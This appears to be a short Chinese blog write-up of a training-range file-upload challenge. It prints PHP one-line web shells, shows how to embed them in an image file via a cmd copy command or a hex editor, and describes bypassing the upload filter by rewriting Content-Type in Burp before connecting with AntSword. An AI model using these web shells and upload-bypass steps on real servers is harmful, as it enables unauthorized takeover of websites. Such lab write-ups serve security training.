![](https://img.laitimes.com/img/9ZDMuAjOiMmIsIjOiQnIsIyZuBnLwcDO5MTN1UDMy0yN0EjNxMTN0ETNxkDMwIDMy0yM3ADNyEjMvwVOwAjMwIzLcNzNwQjMxIzLcd2bsJ2Lc12bj5ycn9Gbi52YuAjMwIzZtl2Lc9CX6MHc0RHaiojIsJye.png)
✨PHP一句話木馬
<?php @eval($_POST["pass"]);?>
<?php eval($_REQUEST["pass"]);?>
詳情可浏覽:Web安全-一句話木馬
✨制作圖檔馬
1)copy指令
copy 1.png/b+1.php/a pic.php
!!!不要使用powershell 請使用cmd
//powershell中copy指令應該指令參數不一樣 導緻各種報錯
2)文本編輯器/十六進制編輯器
用文本編輯器/十六進制編輯器打開圖檔在末尾添加一句話木馬
然後儲存為xxx.php
//經過測試後續也可以蟻劍連接配接 和copy指令比較隻是檔案末尾少了個1A(檔案結束符)
知識擴充:ASCII碼0x1A使檔案意外結束的處理方法
✨Burp改包
Burp開啟proxy後對檔案上傳submit抓包
然後修改Content-Type為image/png
!注意修改位置
//靶場環境隻允許PNG、JPG、GIF格式檔案上傳 改包繞過
✨蟻劍連接配接
獲得flag
結束。
✨圖檔馬注意點
開始遇到問題蟻劍一直連接配接失敗
後來選用了較為簡單的圖檔制作圖檔馬蟻劍就連接配接成功了
制作圖檔馬的圖檔一定要簡單 越簡單越好
比如下面這樣的
⭐轉載請注明出處
本文作者:雙份濃縮馥芮白
原文連結:https://www.cnblogs.com/Flat-White/p/13673112.html
版權所有,如需轉載請注明出處。